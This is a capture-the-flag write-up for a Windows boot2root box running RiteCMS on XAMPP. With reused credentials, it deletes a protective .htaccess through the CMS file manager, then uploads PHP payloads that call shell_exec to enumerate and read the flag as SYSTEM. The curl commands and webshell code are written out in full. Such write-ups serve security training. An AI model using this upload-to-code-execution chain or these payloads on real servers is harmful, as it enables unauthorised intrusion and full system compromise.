N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

The Art of Evasion & Persistence - II

Reuse the Part I creds (webadmin:webhead2290) on RiteCMS (8080). PHP execution in media/ is blocked by .htaccess; delete it via the file manager, upload a PHP payload, and read C:\Users\Administrator\Desktop\proof.txt as nt authority\system.

Boot2RootMarkdown + PDFVery Hardsolved2 minread·375words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/the-art-of-evasion-and-persistence-ii
archive index
12 / 16
read mode
parsed markdown
Writeup loaded.

The Art of Evasion & Persistence - II

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.22
category
Boot2Root
points
971
difficulty
Very Hard
flag format
OWASPKL{xxx}
tools used
nmapcurl
final flag
OWASPKL{33e9d2bbd6c42bf3b71aefbe7dan1543}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Reuse the Part I creds (webadmin:webhead2290) on RiteCMS (8080). PHP execution in media/ is blocked by .htaccess; delete it via the file manager, upload a PHP payload, and read C:\Users\Administrator\Desktop\proof.txt as nt authority\system.

2. Initial Reconnaissance

2.1 Confirm the web service

bash1 lines
1nmap -sC -sV -p 8080 192.168.1.22 -oA art2_nmap_8080
bash2 lines
18080/tcp open  http  Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.0.30)2http-title: Welcome to XAMPP
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Log in and enumerate the media directory

Reuse the Part I creds, then browse the file manager. The login redirects (302) and the media listing shows a .htaccess sitting alongside the uploads dir.

bash2 lines
1curl -s -c proof/rite.cookie -d 'username=webadmin&userpw=webhead2290' -X POST 'http://192.168.1.22:8080/ritecms/admin.php' -o /dev/null -w 'login http=%{http_code}\n'2curl -s -b proof/rite.cookie 'http://192.168.1.22:8080/ritecms/admin.php?mode=filemanager&directory=media' | grep -oiE '\.htaccess|[a-z_]+\.php' | sort -u
bash2 lines
1login http=3022.htaccess

3.2 Confirm .htaccess blocks PHP execution

Fetching anything under media/ while the .htaccess is present returns 403 — PHP is denied until that file is removed via the same file manager.

bash1 lines
1curl -s -o /dev/null -w 'GET /ritecms/media/.htaccess -> http=%{http_code}\n' 'http://192.168.1.22:8080/ritecms/media/.htaccess'
bash1 lines
1GET /ritecms/media/.htaccess -> http=403
PDF evidence frame 03

4. Exploitation / Recovery

4.1 Log into RiteCMS (Part I creds)

bash1 lines
1curl -s -i -c proof/rite.cookie -d 'username=webadmin&userpw=webhead2290' -X POST 'http://192.168.1.22:8080/ritecms/admin.php'
bash2 lines
1HTTP/1.1 302 Found2Location: ./

4.2 Delete media/.htaccess

bash3 lines
1curl -s -i -b proof/rite.cookie \2  -d 'mode=filemanager&delete=.htaccess&dir=media&confirmed=OK+-+Delete+file' \3  -X POST 'http://192.168.1.22:8080/ritecms/admin.php'

4.3 Upload and run the enumeration payload

First upload kali_enum.php to confirm the execution context and locate the flag instead of assuming its path or name.

php8 lines
1<?php2header('Content-Type: text/plain');3echo "WHOAMI=" . trim((string)shell_exec('whoami')) . "\n";4echo "--- Administrator Desktop listing ---\n";5echo shell_exec('dir /b C:\\Users\\Administrator\\Desktop') . "\n";6echo "--- Files matching flag format ---\n";7echo shell_exec('findstr /s /i /m "OWASPKL{" C:\\Users\\Administrator\\Desktop*');8?>
bash7 lines
1curl -s -i -b proof/rite.cookie \2  -F 'mode=filemanager' -F 'directory=media' \3  -F 'file_name=kali_enum.php' -F 'overwrite_file=true' -F 'upload_mode=1' \4  -F 'upload_file_submit=OK - Upload file' \5  -F 'file=@payloads/kali_enum.php;type=application/octet-stream' \6  'http://192.168.1.22:8080/ritecms/admin.php'7curl -s 'http://192.168.1.22:8080/ritecms/media/kali_enum.php'
bash5 lines
1WHOAMI=nt authority\system2--- Administrator Desktop listing ---3proof.txt4--- Files matching flag format ---5C:\Users\Administrator\Desktop\proof.txt

Execution is nt authority\system and proof.txt is the file on the Administrator desktop matching the OWASPKL{ format.

4.4 Upload the flag-read payload

php5 lines
1<?php2header('Content-Type: text/plain');3echo "WHOAMI=" . trim((string)shell_exec('whoami')) . "\n";4echo "PROOF=" . @file_get_contents('C:\\Users\\Administrator\\Desktop\\proof.txt');5?>
bash6 lines
1curl -s -i -b proof/rite.cookie \2  -F 'mode=filemanager' -F 'directory=media' \3  -F 'file_name=kali_proof.php' -F 'overwrite_file=true' -F 'upload_mode=1' \4  -F 'upload_file_submit=OK - Upload file' \5  -F 'file=@payloads/kali_proof.php;type=application/octet-stream' \6  'http://192.168.1.22:8080/ritecms/admin.php'

4.5 Execute payload and read flag

bash1 lines
1curl -s 'http://192.168.1.22:8080/ritecms/media/kali_proof.php'
bash2 lines
1WHOAMI=nt authority\system2PROOF=OWASPKL{33e9d2bbd6c42bf3b71aefbe7dan1543}

> Re-validated live (full chain) on 2026-05-31 via Kali (192.168.1.10): logged into RiteCMS as webadmin (302, authenticated Filemanager confirmed), uploaded a fresh uniquely-named PHP payload through the file manager, executed it -> nt authority\system + the flag above, then deleted the test payload (post-delete http=302, bytes=0).

PDF evidence frame 04

5. Flag

captured flag
OWASPKL{33e9d2bbd6c42bf3b71aefbe7dan1543}

6. Summary of Approach & Key Takeaways

Reused valid CMS creds from Part I.

Deleted the restrictive media/.htaccess via the file manager.

Uploaded a PHP payload through the authenticated file manager.

Enumerated as SYSTEM to locate proof.txt via a desktop listing and OWASPKL{ format search.

Read the located Administrator proof file.

An authenticated file manager + deletable .htaccess = trivial RCE.

On XAMPP/Windows the web service often runs as SYSTEM, so webshell = full compromise.

Payload Files (Required Upload)

payloads/kali_proof.php

payloads/kali_enum.php

PDF evidence frame 05
PDF evidence frame 06
PDF evidence frame 07
PDF evidence frame 08
PDF evidence frame 09